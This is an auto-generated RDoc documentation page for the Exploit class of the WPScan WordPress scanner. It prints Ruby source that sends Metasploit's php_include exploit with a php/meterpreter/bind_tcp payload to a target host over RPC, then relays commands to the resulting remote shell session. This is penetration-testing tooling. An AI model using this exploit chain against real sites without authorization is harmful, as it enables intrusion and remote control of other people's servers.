garfield/wpscan
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
2e4a622cec420d187f05511ac03eae0320d4a189
wpscan/doc/Exploit.html
Christian Mehlmauer 9b6a2805d7 custom plugins directory
2012-09-22 23:50:14 +02:00

892 lines
38 KiB
HTML
Raw Blame History

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Exploit</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/exploit_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/exploit.rb">lib/wpscan/exploit.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-choose_session">#choose_session</a></li>
<li><a href="#method-i-exploit">#exploit</a></li>
<li><a href="#method-i-exploit_info">#exploit_info</a></li>
<li><a href="#method-i-job_id">#job_id</a></li>
<li><a href="#method-i-kill_session">#kill_session</a></li>
<li><a href="#method-i-last_session_id">#last_session_id</a></li>
<li><a href="#method-i-meterpreter_read">#meterpreter_read</a></li>
<li><a href="#method-i-meterpreter_write">#meterpreter_write</a></li>
<li><a href="#method-i-read_shell">#read_shell</a></li>
<li><a href="#method-i-session_count">#session_count</a></li>
<li><a href="#method-i-sessions">#sessions</a></li>
<li><a href="#method-i-start">#start</a></li>
<li><a href="#method-i-write_shell">#write_shell</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Exploit</h1>
<div id="description" class="description">
<p>This library should contain all methods for exploitation.</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="postdata-attribute-method" class="method-detail">
<a name="postdata"></a>
<a name="postdata="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">postdata</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="rhost-attribute-method" class="method-detail">
<a name="rhost"></a>
<a name="rhost="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">rhost</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="type-attribute-method" class="method-detail">
<a name="type"></a>
<a name="type="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">type</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="uri-attribute-method" class="method-detail">
<a name="uri"></a>
<a name="uri="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">uri</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 27</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">wp_url</span>, <span class="ruby-identifier">type</span>, <span class="ruby-identifier">uri</span>, <span class="ruby-identifier">postdata</span>, <span class="ruby-identifier">use_proxy</span>, <span class="ruby-identifier">proxy_addr</span>, <span class="ruby-identifier">proxy_port</span>)
<span class="ruby-ivar">@wp_url</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-identifier">wp_url</span>.<span class="ruby-identifier">to_s</span>)
<span class="ruby-ivar">@rhost</span> = <span class="ruby-ivar">@wp_url</span>.<span class="ruby-identifier">host</span>
<span class="ruby-ivar">@path</span> = <span class="ruby-ivar">@wp_url</span>.<span class="ruby-identifier">path</span>
<span class="ruby-ivar">@type</span> = <span class="ruby-identifier">type</span>
<span class="ruby-ivar">@uri</span> = <span class="ruby-identifier">uri</span>
<span class="ruby-ivar">@postdata</span> = <span class="ruby-identifier">postdata</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-ivar">@use_proxy</span> = <span class="ruby-identifier">use_proxy</span>
<span class="ruby-ivar">@proxy_addr</span> = <span class="ruby-identifier">proxy_addr</span>
<span class="ruby-ivar">@proxy_port</span> = <span class="ruby-identifier">proxy_port</span>
<span class="ruby-identifier">start</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="choose_session-method" class="method-detail ">
<a name="method-i-choose_session"></a>
<div class="method-heading">
<span class="method-name">choose_session</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>if there is more than 1 session, allow the user to choose one.</p>
<div class="method-source-code" id="choose_session-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 148</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">choose_session</span>()
<span class="ruby-keyword">if</span> <span class="ruby-identifier">session_count</span>() <span class="ruby-operator">&gt;=</span> <span class="ruby-value">2</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[?] We have &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">session_count</span>().<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; sessions running. Please choose one by id.&quot;</span>
<span class="ruby-identifier">open_sessions</span> = <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">keys</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">open_session</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">open_sessions</span> <span class="ruby-operator">+=</span> <span class="ruby-identifier">open_session</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; &quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">open_sessions</span>
<span class="ruby-identifier">use_session</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Using session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">use_session</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-identifier">use_session</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Using session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">last_session_id</span>().<span class="ruby-identifier">to_s</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-identifier">last_session_id</span>()
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- choose_session-source -->
</div>
</div><!-- choose_session-method -->
<div id="exploit-method" class="method-detail ">
<a name="method-i-exploit"></a>
<div class="method-heading">
<span class="method-name">exploit</span><span
class="method-args">(msf_module, payload)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>exploit</p>
<div class="method-source-code" id="exploit-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 61</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, <span class="ruby-identifier">payload</span>)
<span class="ruby-identifier">exploit_info</span>(<span class="ruby-identifier">msf_module</span>,<span class="ruby-identifier">payload</span>)
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">result</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, {<span class="ruby-value">:RHOST</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@rhost</span>,<span class="ruby-value">:PATH</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@path</span>,<span class="ruby-value">:PHPURI</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@uri</span>,<span class="ruby-value">:PAYLOAD</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">payload</span>})
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">result</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, {<span class="ruby-value">:RHOST</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@rhost</span>,<span class="ruby-value">:PATH</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@path</span>,<span class="ruby-value">:PHPURI</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@uri</span>,<span class="ruby-value">:POSTDATA</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@postdata</span>, <span class="ruby-value">:PAYLOAD</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">payload</span>})
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">result</span>[<span class="ruby-string">'result'</span>] <span class="ruby-operator">==</span> <span class="ruby-string">&quot;success&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[*] Exploit worked! Waiting for a session...&quot;</span>
<span class="ruby-identifier">session_spawn_timer</span> = <span class="ruby-constant">Time</span>.<span class="ruby-identifier">new</span>
<span class="ruby-keyword">while</span> <span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">nil?</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">empty?</span>
<span class="ruby-comment"># wait for a session to spawn with a timeout of 1 minute</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">Time</span>.<span class="ruby-identifier">now</span> <span class="ruby-operator">-</span> <span class="ruby-identifier">session_spawn_timer</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">60</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Session was not created... exiting.&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">choose_session</span>()
<span class="ruby-identifier">input</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">while</span> <span class="ruby-identifier">input</span>.<span class="ruby-identifier">nil?</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">last_session_id</span>())
<span class="ruby-identifier">input</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">input</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;exit&quot;</span>
<span class="ruby-identifier">kill_session</span>(<span class="ruby-ivar">@session_in_use</span>)
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">last_session_id</span>(), <span class="ruby-identifier">input</span>)
<span class="ruby-identifier">input</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Exploit failed! :(&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- exploit-source -->
</div>
</div><!-- exploit-method -->
<div id="exploit_info-method" class="method-detail ">
<a name="method-i-exploit_info"></a>
<div class="method-heading">
<span class="method-name">exploit_info</span><span
class="method-args">(msf_module,payload)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>output our exploit data</p>
<div class="method-source-code" id="exploit_info-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 105</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">exploit_info</span>(<span class="ruby-identifier">msf_module</span>,<span class="ruby-identifier">payload</span>)
<span class="ruby-identifier">info</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">get_exploit_info</span>(<span class="ruby-identifier">msf_module</span>)
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| [EXPLOIT]&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Name: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">info</span>[<span class="ruby-string">'name'</span>]
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Description: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">info</span>[<span class="ruby-string">'description'</span>].<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\t&quot;</span>, <span class="ruby-string">&quot;&quot;</span>).<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\n\n&quot;</span>,<span class="ruby-string">&quot;\n&quot;</span>).<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\n&quot;</span>, <span class="ruby-string">&quot;\n| &quot;</span>).<span class="ruby-identifier">chop!</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| [OPTIONS]&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| RHOST: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@rhost</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| PATH: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@path</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| URI: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">uri</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| POSTDATA: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-operator">!=</span> <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Payload: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">payload</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- exploit_info-source -->
</div>
</div><!-- exploit_info-method -->
<div id="job_id-method" class="method-detail ">
<a name="method-i-job_id"></a>
<div class="method-heading">
<span class="method-name">job_id</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>not sure if this is needed?! not used.</p>
<div class="method-source-code" id="job_id-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 122</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">job_id</span>()
<span class="ruby-identifier">jobs</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">jobs</span>()
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">jobs</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- job_id-source -->
</div>
</div><!-- job_id-method -->
<div id="kill_session-method" class="method-detail ">
<a name="method-i-kill_session"></a>
<div class="method-heading">
<span class="method-name">kill_session</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>kill a session by session id</p>
<div class="method-source-code" id="kill_session-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 167</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">kill_session</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-keyword">begin</span>
<span class="ruby-identifier">killed</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">kill_session</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">killed</span>[<span class="ruby-string">'result'</span>] <span class="ruby-operator">==</span> <span class="ruby-string">&quot;success&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[-] Session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">id</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; killed.&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">rescue</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[] Session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">id</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; does not exist.&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- kill_session-source -->
</div>
</div><!-- kill_session-method -->
<div id="last_session_id-method" class="method-detail ">
<a name="method-i-last_session_id"></a>
<div class="method-heading">
<span class="method-name">last_session_id</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>the last active session id created</p>
<div class="method-source-code" id="last_session_id-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 135</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">last_session_id</span>()
<span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">keys</span>.<span class="ruby-identifier">last</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- last_session_id-source -->
</div>
</div><!-- last_session_id-method -->
<div id="meterpreter_read-method" class="method-detail ">
<a name="method-i-meterpreter_read"></a>
<div class="method-heading">
<span class="method-name">meterpreter_read</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>read data from a meterpreter session data must be base64 decoded.</p>
<div class="method-source-code" id="meterpreter_read-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 196</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-constant">Base64</span>.<span class="ruby-identifier">decode64</span>(<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">id</span>)[<span class="ruby-string">'data'</span>])
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_read-source -->
</div>
</div><!-- meterpreter_read-method -->
<div id="meterpreter_write-method" class="method-detail ">
<a name="method-i-meterpreter_write"></a>
<div class="method-heading">
<span class="method-name">meterpreter_write</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>write data to a meterpreter session data must be base64 encoded.</p>
<div class="method-source-code" id="meterpreter_write-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 203</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">id</span>, <span class="ruby-constant">Base64</span>.<span class="ruby-identifier">encode64</span>(<span class="ruby-identifier">data</span>))
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_write-source -->
</div>
</div><!-- meterpreter_write-method -->
<div id="read_shell-method" class="method-detail ">
<a name="method-i-read_shell"></a>
<div class="method-heading">
<span class="method-name">read_shell</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>read data from a shell, meterpreter is not classed as a shell.</p>
<div class="method-source-code" id="read_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 182</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">read_shell</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">read_shell</span>(<span class="ruby-identifier">id</span>)[<span class="ruby-string">'data'</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- read_shell-source -->
</div>
</div><!-- read_shell-method -->
<div id="session_count-method" class="method-detail ">
<a name="method-i-session_count"></a>
<div class="method-heading">
<span class="method-name">session_count</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>a count of the amount of active sessions</p>
<div class="method-source-code" id="session_count-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 141</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">session_count</span>()
<span class="ruby-identifier">sessions</span>().<span class="ruby-identifier">size</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- session_count-source -->
</div>
</div><!-- session_count-method -->
<div id="sessions-method" class="method-detail ">
<a name="method-i-sessions"></a>
<div class="method-heading">
<span class="method-name">sessions</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>all sessions and related session data</p>
<div class="method-source-code" id="sessions-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 129</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">sessions</span>()
<span class="ruby-identifier">sessions</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">sessions</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- sessions-source -->
</div>
</div><!-- sessions-method -->
<div id="start-method" class="method-detail ">
<a name="method-i-start"></a>
<div class="method-heading">
<span class="method-name">start</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>figure out what to exploit</p>
<div class="method-source-code" id="start-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 43</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">start</span>()
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@type</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;RFI&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[?] Exploit? [y/n]&quot;</span>
<span class="ruby-identifier">answer</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">answer</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/^y/</span>
<span class="ruby-identifier">msf_module</span> = <span class="ruby-string">&quot;exploit/unix/webapp/php_include&quot;</span>
<span class="ruby-identifier">payload</span> = <span class="ruby-string">&quot;php/meterpreter/bind_tcp&quot;</span>
<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, <span class="ruby-identifier">payload</span>)
<span class="ruby-keyword">else</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-ivar">@type</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;SQLI&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- start-source -->
</div>
</div><!-- start-method -->
<div id="write_shell-method" class="method-detail ">
<a name="method-i-write_shell"></a>
<div class="method-heading">
<span class="method-name">write_shell</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>write data to a shell, meterpreter is not classed as a shell.</p>
<div class="method-source-code" id="write_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 189</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">write_shell</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">write_shell</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- write_shell-source -->
</div>
</div><!-- write_shell-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink